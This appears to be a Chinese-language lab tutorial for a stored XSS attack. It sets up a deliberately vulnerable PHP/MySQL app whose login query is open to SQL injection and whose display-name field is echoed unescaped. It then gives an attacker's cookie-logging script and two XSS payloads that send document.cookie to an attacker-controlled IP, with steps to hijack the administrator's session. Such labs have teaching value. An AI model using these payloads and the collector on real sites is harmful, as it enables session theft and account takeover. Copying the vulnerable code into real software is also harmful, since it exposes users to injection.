创建数据库
CREATE DATABASE test;
USE test;

创建数据表
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(100) DEFAULT NULL,
  `password` varchar(300) DEFAULT NULL,
  `ctime` varchar(100) DEFAULT NULL,
  `remark` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=47 DEFAULT CHARSET=utf8 

创建数据
INSERT INTO users VALUE(1,'admin',md5(123456),'2017-09-21','Administrator');
INSERT INTO users VALUE(NULL,'good',md5(123456),'2017-09-21','GoodMorning');
INSERT INTO users VALUE(NULL,'taste',md5(123456),'2017-09-21','taste');
INSERT INTO users VALUE(NULL,'apple',md5(123456),'2017-09-21','IPHONE');
INSERT INTO users VALUE(NULL,'pamxie',md5(123456),'2017-09-21','pixiesi');
INSERT INTO users VALUE(NULL,'test',md5(123456),'2017-09-21','hacker');
INSERT INTO users VALUE(NULL,'demon',md5(123456),'2017-09-21','OK');

登陆代码(login.php)：
==============================================================
==============================================================
==============================================================
<?php
  session_start();
  mysql_connect('localhost:3306','root','yourpasswd'); //这里要修改
  mysql_set_charset('utf8');
  mysql_select_db('test');                             //这里要修改
    
  //check login
  if($_POST[username] && $_POST[password]){
    $username = $_POST['username'];
    $password = md5($_POST['password']);
    $login_sql = "select * from users where username = '$username' and password = '$password'";
    $login_res = mysql_query($login_sql);
    $login_row = mysql_fetch_assoc($login_res);
    if($login_row){
      $_SESSION[disname] = $login_row[remark];
      $_SESSION[id] = $login_row[id];
      $_SESSION[username] = $username;
      echo "<script>window.location='function.php'</script>";
    }else{
      echo "<script>alert('login failed!')</script>";
    }
  }
?>
  
<form action="login.php" method="post">
 username: <input name="username"/><br>
 password: <input name="password" type="password" />
 <input type="submit" value="login" />
</form>

==============================================================
==============================================================
==============================================================




功能代码(function.php)：
==============================================================
==============================================================
==============================================================
<?php
  session_start();
  if(!$_SESSION[username]){
    echo "Need to login";
    exit;
  }else{
    mysql_connect('localhost:3306','root','yourpasswd');   //这里要修改
    mysql_set_charset('utf8');
    mysql_select_db('test');                               //这里要修改

    //如果接到POST请求:
    if($_POST['disname']){
      $sql = "update users set remark = '$_POST[disname]' where id = $_SESSION[id]";
      $res = mysql_query($sql);
      if($res)echo "<script>alert('Success')</script>";
      else echo "<script> alert('Update failed')</script>";
    }

    echo "Welcome, ".$_SESSION[username];
    echo "<br>your display name is ".$_SESSION[disname];
?>


<form name="tags" id="tags" method='post' action='function.php'>
Update Display name:<br><input name="disname"><br>
<input type="submit" value="Ok"/>
</form>

<?php
    //如果是管理员登陆，有查看权限
    if($_SESSION[id] == 1){
      echo "List of user's are:<br>";
      $query = "select id,remark from users";
      $res = mysql_query($query);
      while($row = mysql_fetch_assoc($res))
        echo "$row[id] : $row[remark] <br>";
    }
  }
?>
==============================================================
==============================================================
==============================================================


攻击者盗取代码(get.php)：
==============================================================
==============================================================
==============================================================
<?php
  $myfile = fopen("session", "a") or die("Unable to open file!");
  fwrite($myfile, date("Y/m/d H:i:s").":  ");
  fwrite($myfile, $_GET[g]."\n");
  fclose($myfile);
  echo "<script>window.history.go(-1)</script>";
?>
==============================================================
记得改足权限
==============================================================
==============================================================

使用普通账户登陆，在表单里提交下面两种xss攻击中的一个,这里IP要修改

<a href=\"#\" onclick=\"document.location=\'http://这里是你的IP/get.php?g=\'+document.cookie\">有种你点我</a>

<script>window.onload=function(){window.location=\"http://这里是你的IP/get.php?g=\"+document.cookie}</script>


提交完后xss按钮就会被存储在数据库中，管理员登陆就可以看到xss攻击按钮或者直接xss跳转
来盗取管理员的SESSION,这个SESSION值可以直接拿来用然后成功提权到管理员账号权限

使用火狐的F12来修改当前的SESSION值即可

